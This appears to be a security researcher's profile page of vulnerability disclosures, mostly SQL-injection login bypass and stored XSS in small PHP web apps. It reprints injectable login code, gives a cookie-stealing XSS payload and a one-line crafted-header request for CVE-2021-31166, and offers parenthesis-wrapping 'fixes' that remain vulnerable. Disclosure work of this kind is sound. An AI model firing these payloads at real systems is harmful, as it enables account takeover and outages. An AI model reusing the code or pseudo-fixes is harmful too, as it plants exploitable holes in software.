nu11secur1ty (53)
Last Login: September 17, 2021
nu11secur1ty's Contributions (23)
Technical Analysis
CVE-nu11-13-091721
Vulnerability PHPapp code validate.phpand structure also
<?php require_once 'conn.php'; $username = $_POST['username']; $password = $_POST['password']; $query = $conn->query("SELECT * FROM `admin` WHERE `username` = '$username' && `password` = '$password'") or die(mysqli_error()); $validate = $query->num_rows; $fetch = $query->fetch_array(); if($validate > 0){ echo "Success"; session_start(); $_SESSION['admin_id'] = $fetch['admin_id']; }else{ echo "Error"; }
Simple fix.
- WARNING: THIS IS
NOT FIXOF THE PROBLEM, Just an example =)
<?php require_once 'conn.php'; $username = $_POST['username']; $password = $_POST['password']; $query = $conn->query("SELECT * FROM `admin` WHERE `username` = ('$username') && `password` = '$password'") or die(mysqli_error()); $validate = $query->num_rows; $fetch = $query->fetch_array(); if($validate > 0){ echo "Success"; session_start(); $_SESSION['admin_id'] = $fetch['admin_id']; }else{ echo "Error"; }
Description:
The Simple Membership System using PHP and AJAX is vulnerable to remote SQL-Injection-Bypass-Authentication for the admin account/XSS-Stored PWNED.
remote SQL-Injection-Bypass-Authentication: https://portswigger.net/support/using-sql-injection-to-bypass-authentication.
The parameters (username and password) from the login form is not protected correctly and there is no security and escaping from malicious payloads.
When the user will sending a malicious query or malicious payload to the MySQL server for login to the admin account on the system,
he can bypass the login credentials and take control of this account. And the second time he can adding an payload by using XSS-Stored
BR
- [+] @nu11secur1ty System Administrator – Infrastructure and Penetration Testing Engineer
Reproduce:
Proof:
BR nu11secur1ty
Technical Analysis
CVE-nu11-12-09162021
Description:
The South Gate Inn Online Reservation System © South Gate Inn is vulnerable to remote SQL-Injection-Bypass-Authentication for the admin account and XSS-Stored PWNED.
remote SQL-Injection-Bypass-Authentication: https://portswigger.net/support/using-sql-injection-to-bypass-authentication.
The parameters (email and Password) from the login form are not protected correctly and there is no security and escaping from malicious payloads.
When the user will sending a malicious query or malicious payload to the MySQL server for login to the admin account on the system,
he can bypass the login credentials and take control of this account.
And the second time he can access the admin account and adding a payload by using the XSS-Stored technique which can break the MySQL server.
Reproduce:
Proof:
Technical Analysis
CVE-nu11-11
Description:
The AHSS-PHP (by: oretnom23 ) v1.0 is vulnerable in the application /scheduler/classes/Login.php to remote SQL-Injection-Bypass-Authentication + XSS-Stored Hijacking PHPSESSID
- m0re info: https://portswigger.net/support/using-sql-injection-to-bypass-authentication.
The parameter (username) from the login form is not protected correctly and there is no security and escaping from malicious payloads.
When the user will sending a malicious query or malicious payload to the MySQL server he can bypass the login credentials and take control of the administer account.
- XSS – Stored PHPSESSID Vulnerable
- The vulnerable XSS app: is “manage_assembly”, parameters: “room_name” “location” and “description”
After the successful SQL injection, the malicious user can be storing an XSS payload whit who can take the
active PHPSESSID session.
- remote PHPSESSID – Injection
- After the successful XSS attack the malicious user can take control of the administrative account of the system from everywhere
by using the PHPSESSID, and then he can make a lot of bad things!
CONCLUSION:
This vendor must STOP creating all these broken projects and vulnerable software programs, probably he is not a developer!
BR
- [+] @nu11secur1ty System Administrator – Infrastructure and Penetration Testing Engineer
Reproduce:
Proof:
BR nu11secur1ty
Technical Analysis
CVE-nu11-10-09102021
Vendor
Description:
The PHP CRUD (by: oretnom23 ) is vulnerable to XSS Stored Attack and remote SQL-Injection special characters.
In the application: ajax_crud the parameters, first_name, last_name, and email are vulnerable to XSS Stored attack!
When the user will sending a malicious javascript payload, he can store a special character – string, onto the MySQL server.
The MySQL server can’t read it because there have no prepared statements or the appropriate replacement/formatting rules
in order to prevent SQL injection and the system will be down.
Status: CRITICAL
Documentation, HOW TO CHARACTER SET Statement:
Proof:
Technical Analysis
CVE-nu11-09
Vulnerability Description:
The POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote SQL-Injection-Bypass-Authentication for the admin account in app /purchase_order/classes/Login.php.
remote SQL-Injection-Bypass-Authentication: https://portswigger.net/support/using-sql-injection-to-bypass-authentication.
The parameter (username) from the login form is not protected correctly and there is no security and escaping from malicious payloads.
When the user will sending a malicious query or malicious payload to the MySQL server, he can bypass the login credentials and take control of the admin account.
Vulnerability PHP code:
public function login(){
extract($_POST);
$qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') ");
if($qry->num_rows > 0){
foreach($qry->fetch_array() as $k => $v){
if(!is_numeric($k) && $k != 'password'){
$this->settings->set_userdata($k,$v);
}
}
$this->settings->set_userdata('login_type',1);
return json_encode(array('status'=>'success'));
}else{
return json_encode(array('status'=>'incorrect','last_qry'=>"SELECT * from users where username = '$username' and password = md5('$password') "));
}
}
Responding from the hacked target:
- – –
PoC + checks=PoC-CVE-nu11-09-rfth.py
C:\Users\venvaropt\Desktop\CVE-nu11-09-09092021>python PoC-CVE-nu11-09.py DevTools listening on ws://127.0.0.1:63704/devtools/browser/bf18be59-2361-4c08-82dc-689957d5bf9e The payload for CVE-nu11-09 is deployed and your admin account is PWNED by SQL - Injection Please see the screenshot poc.png to see if your exploit is working =) BR **[**[@nu11secur1ty](/contributors/nu11secur1ty)**](/contributors/nu11secur1ty)** This target gives a positive <Response [200]> from inside, after bypassing the login :D C:\Users\venvaropt\Desktop\CVE-nu11-09-09092021>
Exploit technique:
Python + Selenium + hidden login && screenshot
Proof:
BR
Technical Analysis
CVE-nu11-08-09072021
VENDOR
Vulnerability Description:
The SURMS – PHP (by: oretnom23 ) v1.0 is vulnerable from remote SQL-Injection-Bypass-Authentication for the admin account in app: /storage/classes/Login.php and XSS PWNED PHPSESSID Hijacking in app “tenants”.
Remote SQL-Injection-Bypass-Authentication: https://portswigger.net/support/using-sql-injection-to-bypass-authentication.
The parameter (username) from the login form is not protected correctly and there is no security and escaping from malicious payloads.
When the user will sending a malicious query or malicious payload to the MySQL server for those three accounts, he can bypass the login credentials and take control of these accounts.
And the second time he can access the admin account by using the PHPSESSID Hijacking technique.
Vulnerable PHP code:
public function login(){
extract($_POST);
$qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') ");
if($qry->num_rows > 0){
foreach($qry->fetch_array() as $k => $v){
if(!is_numeric($k) && $k != 'password'){
$this->settings->set_userdata($k,$v);
}
}
$this->settings->set_userdata('login_type',1);
return json_encode(array('status'=>'success'));
}else{
return json_encode(array('status'=>'incorrect','last_qry'=>"SELECT * from users where username = '$username' and password = md5('$password') "));
}
}
Proof:
Technical Analysis
CVE-nu11-07
VENDOR
- – – ## eLearning V2(by: oretnom23) is vulnerable from remote SQL-Injection-Bypass-Authentication
Description:
The eLearning V2(by: oretnom23) is vulnerable from remote SQL-Injection-Bypass-Authentication in 3 accounts of the system (admin, Faculty & Student) in app /elearning/classes/Login.php.
remote SQL-Injection-Bypass-Authentication: https://portswigger.net/support/using-sql-injection-to-bypass-authentication.
The parameter (username, faculty_id, and student_id) from the login form is not protected correctly and there is no security and escaping from malicious payloads.
When the user will sending a malicious query or malicious payload to the MySQL server for those three accounts, he can bypass the login credentials and take control of these accounts.
- – – Vulnerable
PHPapp code in/elearning/classes/Login.php
public function login(){
extract($_POST);
$qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') ");
if($qry->num_rows > 0){
foreach($qry->fetch_array() as $k => $v){
if(!is_numeric($k) && $k != 'password'){
$this->settings->set_userdata($k,$v);
}
}
$this->settings->set_userdata('login_type',1);
$sy = $this->conn->query("SELECT * FROM academic_year where status = 1");
foreach($sy->fetch_array() as $k =>$v){
if(!is_numeric($k)){
$this->settings->set_userdata('academic_'.$k,$v);
}
}
return json_encode(array('status'=>'success'));
}else{
return json_encode(array('status'=>'incorrect','last_qry'=>"SELECT * from users where username = '$username' and password = md5('$password') "));
}
}
public function flogin(){
extract($_POST);
$qry = $this->conn->query("SELECT * from faculty where faculty_id = '$faculty_id' and `password` = '".md5($password)."' ");
if($qry->num_rows > 0){
foreach($qry->fetch_array() as $k => $v){
if(!is_numeric($k)){
$this->settings->set_userdata($k,$v);
}
}
$this->settings->set_userdata('login_type',2);
$sy = $this->conn->query("SELECT * FROM academic_year where status = 1");
foreach($sy->fetch_array() as $k =>$v){
if(!is_numeric($k)){
$this->settings->set_userdata('academic_'.$k,$v);
}
}
return json_encode(array('status'=>'success'));
}else{
return json_encode(array('status'=>'incorrect'));
}
}
public function slogin(){
extract($_POST);
$qry = $this->conn->query("SELECT * from students where student_id = '$student_id' and `password` = '".md5($password)."' ");
if($qry->num_rows > 0){
foreach($qry->fetch_array() as $k => $v){
if(!is_numeric($k)){
$this->settings->set_userdata($k,$v);
}
}
CONCLUSION:
This vendor must STOP creating all these broken projects and vulnerable software programs, probably he is not a developer!
[+] by @nu11secur1ty System Administrator – Infrastructure and Penetration Testing Engineer
Reproduce:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/CVE-nu11-07
Proof:
BR
Technical Analysis
CVE-nu11-05 MSMS-PHP (by: oretnom23 ) v1.0 HIT STRIKE
Description:
The MSMS-PHP (by: oretnom23 ) v1.0 is vulnerable in three sections!
- – – remote SQL-Injection-Bypass-Authentication
- m0re info: https://portswigger.net/support/using-sql-injection-to-bypass-authentication.
The parameter (username) from the login form is not protected correctly and there is no security and escaping from malicious payloads.
When the user will sending a malicious query or malicious payload to the MySQL server he can bypass the login credentials and take control of the administer account.
- – – XSS – Stored PHPSESSID Vulnerable
- – The vulnerable XSS app: is “brand”, parameters: “name” and “description”
After the successful SQL injection, the malicious user can be storing an XSS payload whit who can take the
active PHPSESSID session.
- – – remote PHPSESSID – Hijacking
- After the successful XSS attack the malicious user can take control of the administrative account of the system from everywhere
by using the PHPSESSID, and then he can make a lot of bad things!
Remote vulnerable links execution:
- – – [+] . http://localhost/mobile_store/admin/login.php
- – – [+] . http://localhost/mobile_store/admin/?page=maintenance/brand
Broken query:
public function login(){
extract($_POST);
$qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') ");
if($qry->num_rows > 0){
foreach($qry->fetch_array() as $k => $v){
if(!is_numeric($k) && $k != 'password'){
$this->settings->set_userdata($k,$v);
}
}
The fix, but not strong enough!
public function login(){
extract($_POST);
$qry = $this->conn->query("SELECT * from users where username = ('$username') and password = md5('$password') ");
if($qry->num_rows > 0){
foreach($qry->fetch_array() as $k => $v){
if(!is_numeric($k) && $k != 'password'){
$this->settings->set_userdata($k,$v);
}
}
Stored XSS payload:
<p class="truncate-1 m-0">alert(document.cookie)</p>
Proof:
- [+] href
CONCLUSION:
- – – [+]
This vendor must STOP creating all these broken projects and vulnerable software programs, probably he is not a developer!
BR
- [+] @nu11secur1ty System Administrator – Infrastructure and Penetration Testing Engineer
Technical Analysis
Ship Ferry Ticket Reservation System v1.0
Vendor
Description:
The Ship/Ferry Ticket Reservation System v1.0 is vulnerable in the application /ship_ticketing/classes/Login.php from SQL-Injection-Bypass-Authentication.
The parameter (username) from the login form is not protected correctly and there is no security and escaping from malicious payloads.
When the user will sending a malicious query or malicious payload to the MySQL server he can bypass the login credentials and take control of the administer account.
Broken structure:
public function login(){
extract($_POST);
$qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') ");
if($qry->num_rows > 0){
foreach($qry->fetch_array() as $k => $v){
if(!is_numeric($k) && $k != 'password'){
$this->settings->set_userdata($k,$v);
}
}
Simple fix, but not enough strong!!!:
public function login(){
extract($_POST);
$qry = $this->conn->query("SELECT * from users where username = ('$username') and password = md5('$password') ");
if($qry->num_rows > 0){
foreach($qry->fetch_array() as $k => $v){
if(!is_numeric($k) && $k != 'password'){
$this->settings->set_userdata($k,$v);
}
}
Proof:
BR
[+] @nu11secur1ty
Technical Analysis
CVE-nu11-03
Online Leave Management System SQL-Injection-Bypass-Authentication:
Vendor:
- [+] href
Description:
The OLMS – PHP (by: oretnom23 ) v1.0 is vulnerable in the application /leave_system/classes/Login.php from SQL-Injection-Bypass-Authentication
m0re info: https://portswigger.net/support/using-sql-injection-to-bypass-authentication.
The parameter (username) from the login form is not protected correctly and there is no security and escaping from malicious payloads.
When the user will sending a malicious query or malicious payload to the MySQL server he can bypass the login credentials and take control of the administer account.
Broken query:
public function login(){
extract($_POST);
$qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') ");
if($qry->num_rows > 0){
foreach($qry->fetch_array() as $k => $v){
if(!is_numeric($k) && $k != 'password'){
$this->settings->set_userdata($k,$v);
}
}
The fix, but not strong enough!
public function login(){
extract($_POST);
$qry = $this->conn->query("SELECT * from users where username = ('$username') and password = md5('$password') ");
if($qry->num_rows > 0){
foreach($qry->fetch_array() as $k => $v){
if(!is_numeric($k) && $k != 'password'){
$this->settings->set_userdata($k,$v);
}
}
Proof:
- [+]href
Conclusion and solution of the problem:
- [+]href
BR
- [+] @nu11secur1ty
Technical Analysis
CVE-nu11-04
Covid-19 Contact Tracing System Web App with QR Code Scanning CTS-QR (by: oretnom23 ) v1.0
Vendor:
Broken query:
public function login(){
extract($_POST);
$qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') ");
if($qry->num_rows > 0){
foreach($qry->fetch_array() as $k => $v){
if(!is_numeric($k) && $k != 'password'){
$this->settings->set_userdata($k,$v);
}
}
The fix, but not strong enough!
public function login(){
extract($_POST);
$qry = $this->conn->query("SELECT * from users where username = ('$username') and password = md5('$password') ");
if($qry->num_rows > 0){
foreach($qry->fetch_array() as $k => $v){
if(!is_numeric($k) && $k != 'password'){
$this->settings->set_userdata($k,$v);
}
}
Proof:
- [+]video
Description:
The Covid-19 Contact Tracing System Web App with QR Code Scanning CTS-QR (by: oretnom23 ) v1.0 is vulnerable in the application /cts_qr/classes/Login.php from SQL-Injection-Bypass-Authentication
m0re info: https://portswigger.net/support/using-sql-injection-to-bypass-authentication.
The parameter (username) from the login form is not protected correctly and there is no security and escaping from malicious payloads.
When the user will sending a malicious query or malicious payload to the MySQL server he can bypass the login credentials and take control of the administer account.
Please, report here:
[+]href
NOTE:
-
- – [+]
The owner is not satisfied with the fact that all his projects are using the same broken MySQL query architecture.=)
- – [+]
M0re:
- [+] href
Conclusion and solution of the problem:
- [+]href
BR
- [+] @nu11secur1ty
Technical Analysis
Description:
Cross-Site Scripting (XSS SVG – Stored – PWNED PHPSESSID RCE) vulnerability exists in FlatCore-CMS 2.0.7 via the upload image function.
When the malicious user trick the administrator of the CMS system to upload the malicious SVG file, then
he can be already executed this code from everywhere on the internet, and the thing will be more worst than ever for the owner of this CMS system! ;)
Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-39609
Proof:
Proof: PHPSESSID PWNED
Technical Analysis
The SES-by_oretnom23 -v1.0 is vulnerable in the application /elearning/classes/Login.php which is called from /elearning/dist/js/script.js app. The parameter (username) from the login form is not protected correctly and there is no security and escaping from malicious payloads. When the user is sending a request to the MySQL server he can bypass the login credentials and take control of the administer account.
Reproduce:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/SES-by_oretnom23%20-v1.0
Proof:
Technical Analysis
Description:
The B&E Tracker (by: oretnom23 ) v1.0 is vulnerable
in the application /expense_budget/classes/Login.php which is called from /expense_budget/dist/js/script.js app.
The parameter (username) from the login form is not protected correctly and there is no security and escaping from malicious payloads.
When the user is sending a request to the MySQL server he can bypass the login credentials and take control of the administer account.
Reproduce:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/B%26E%20Tracker-by:oretnom23-v1.0
Proof:
BR nu11secur1ty
Technical Analysis
Description:
The Online-Catering-Reservation-DT Food-Catering(by: oretnom23)v1.0 is vulnerable
in the application /catering/classes/Login.php which is called from /catering/dist/js/script.js app.
The parameter (username) from the login form is not protected correctly and there is no security and escaping from malicious payloads.
When the user is sending a request to the MySQL server he can bypass the login credentials and take control of the administer account.
More:
https://www.nu11secur1ty.com/2021/08/online-catering-reservation-dt-sql.html
More:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/Online-Catering-Reservation-DT-Food-Catering
- and on the owner of the exploit, on the home page:
https://www.nu11secur1ty.com/2021/08/online-catering-reservation-dt-sql.html
Simple proof and simple fix but not strong! =)
BR
Technical Analysis
XSS-Stored PHPSESSID user PWNED on Hospital Management System Vulnerable parameter “txtMsg” on contact
Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-38757
Proof:
Technical Analysis
TastyIgniter 3.0.7 allows XSS – Stored
Vulnerability Assessment
XSS-Stored Allow 48 characters
Url
http://192.168.1.3/setup-master/admin/customers/create
Payload
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-38699
Vulnerable parameter
Customer[first_name]
Proof:
Technical Analysis
Link: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-38603
Vulnerability parameter in profil.php “id_content”
NOTE: The same problem is in the demo account in the online version
https://www.softaculous.com/softaculous/demos/PluXml
Technical Analysis
CVE-mitre:index.php/appointment/insert_patient_add_appointment in Chikitsa Patient Management System 2.0.0 allows XSS.
nu11secur1ty: XSS-Stored – Brutal PWNED on Chikitsa 2.0.0 parameter “name” + User: Unrestricted File Upload “.php”
Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-38152
Proof:
Technical Analysis
OneNav beta 0.9.12 allows XSS via the Add Link feature. PWNED by using remote execution script, automated for this vulnerability. NOTE: the vendor’s position is that there intentionally is not any XSS protection at present, because the attack risk is largely limited to a compromised account; however, XSS protection is planned for a future release.
More:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-38138
Proof:
Technical Analysis
PandoraFMS <=7.54 allows Stored XSS by placing a payload in the name field of a visual console. When a user or an administrator visits the console, the XSS payload will be executed.
Reproduce:
Technical Analysis
CVE-2021-33041
If someone malicious guy sends MD file with malicious content, and for example, the user is a real user ;) and don’t know what actually is going on, and open the file with VMD, boom, the game is over for him.
#Proof:
https://streamable.com/j7e13y – low
https://streamable.com/oykc86 – medium
https://streamable.com/yywb0h – high
https://streamable.com/ngx2xm – very high
M0r3:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-33041
BR
Technical Analysis
According to Microsoft’s documentation, here are the affected platforms:
Windows Server, version 2004 (or 20H1) (Server Core installation),
Windows 10 Version 2004 (or 20H1) for ARM64/x64/32-bit Systems,
Windows Server, version 20H2 (Server Core Installation),
Windows 10 Version 20H2 for ARM64/x64/32-bit Systems.
CVE-2021-31166
One Line
python -c “import requests; print(requests.get(’http://192.168.1.101/’, headers = {‘Accept-Encoding’: ‘pwn, pwned, tupaci, psevdoIT, krastavichar, *, ,’,}))”Proof:
M0r3
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-31166
BR
